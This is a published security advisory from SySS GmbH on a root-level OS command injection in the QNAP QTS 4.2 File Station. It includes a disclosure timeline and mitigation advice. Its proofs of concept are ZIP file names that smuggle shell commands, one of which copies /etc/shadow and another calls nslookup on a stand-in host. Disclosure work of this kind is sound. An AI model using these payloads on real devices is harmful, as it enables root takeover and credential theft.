QNAP QTS 4.2.0 Build 20160311 / Build 20160601 Command Injection

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Advisory ID: SYSS-2016-048  
Product: QNAP QTS  
Manufacturer: QNAP  
Affected Version(s): 4.2.0 Build 20160311 and Build 20160601  
Tested Version(s): 4.2.0 Build 20160311 - 4.2.2 Build 20160812  
Vulnerability Type: OS Command Injection (CWE-78)  
Risk Level: High  
Solution Status: unfixed  
Manufacturer Notification: 2016-06-03  
Solution Date: tbd.  
Public Disclosure: 2016-08-18  
CVE Reference: Not assigned  
Author of Advisory: Sebastian Nerz (SySS GmbH)  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
QTS is the operating system used by manufacturer QNAP on its series of  
NAS devices (see [1]).  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
  
The SySS GmbH found an os command injection in the file station of the  
current QTS administrative interface.  
  
This type of vulnerability allows an attacker to run arbitrary commands  
on the operating system of the host as root.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC, Build 20160311)  
  
1. Log in to the QNAP. The user needs sufficient permissions to either  
rename or create ZIP files.  
2. Upload or create a ZIP file with the following name:  
  
a;echo -e "cp \x2fetc\x2fshadow \x2fshare\x2fCACHEDEV1_DATA\x2f[current  
dir]" | bash ; echo .zip  
  
3. Right-click on the ZIP file and select Extract > Extract to   
[pre-selected directory with the name of the ZIP file]  
(Extract > last entry)  
  
4. The contained code will be exected, in this case: /etc/shadow copied  
to the current directory. Other code can of course be run as well,  
e.g. to display some strings on the front-display of the QNAP (tested  
with a 470 Pro) name the ZIP file like this and extract it:  
  
a;lcd_tool -1 PoC -2 OS-Command-Injection; echo .zip  
  
Depending on the system this might not work out of the box.  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC, Build 20160601)  
  
1. Log in to the QNAP. The user needs sufficient permissions to either  
rename or create ZIP files.  
2. Upload or create a ZIP file with the following name:  
  
test$(nslookup examplehost).zip  
  
3. Right-click on the ZIP file and select Extract > Extract files  
  
4. The contained code will be executed as can be confirmed by listening   
on the corresponding network.  
  
The original exploit (Extract > last entry) will not work on the current  
release of QTS. This exploit should work on previous versions of QTS as  
well.  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
The manufacturer has not released any security update or patch so far.  
Administrators of QNAP QTS 4.2 installations should ensure that only   
trusted users/administrators have access to the device.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2016-06-03: Vulnerability discovered and reported to manufacturer  
2016-06-20: Vulnerability report confirmed by manufacturer  
2016-06-22: Report updated to adress (minor) changes in build 20160601  
2016-07-06: Updated report confirmed by manufacturer  
2016-07-06: Manufacturer asked for timeline regarding a fix  
2016-07-18: Manufacturer reminded about upcoming public disclosure  
2016-08-18: Public disclosure  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Product website for QNAP QTS  
http://www.qnap.com/qts/4.2/en/  
[2] SySS Security Advisory SYSS-2016-048  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-048.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/responsible-disclosure-policy/  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
Security vulnerability found by Sebastian Nerz of the SySS GmbH.  
  
E-Mail: sebastian.nerz-at-syss.de  
Public Key:  
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc  
Key ID: 0x9180FDB2  
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1  
  
iQEcBAEBCgAGBQJXtWViAAoJENEtJqSRgP2yhjUIALi90iAlcbMaJuDlxw5myP22  
ULuhqRRCsqS6kR5gVrUA7eJSRHYDubXF1PlW9SoYt3bdTfRyhb1Pwf71yGggmZ+M  
eCS6ImGIwKvEoJNkXsWLSV9p2hd/ha/GgTPwEa0wwUJYvuBJfadthH71WlKi7e5u  
68RYX3L/IO2wylkTa6L0MJU4le48EpZOZxgcuJIXTo5qt/nDDApKS3h1W3EqNAo7  
hPsm2bZPiPyynxK79H8zUIaQylFjXRnyfBhPZ7EjYI2riXkya6dk6CT7qtpt2Ljk  
tpBFgduJCz/a+iFsa7yCk5U6cFLi4vpcXVVE4DUf/BvTwqM4y715sTdGdOWrg00=  
=PDqZ  
-----END PGP SIGNATURE-----  
`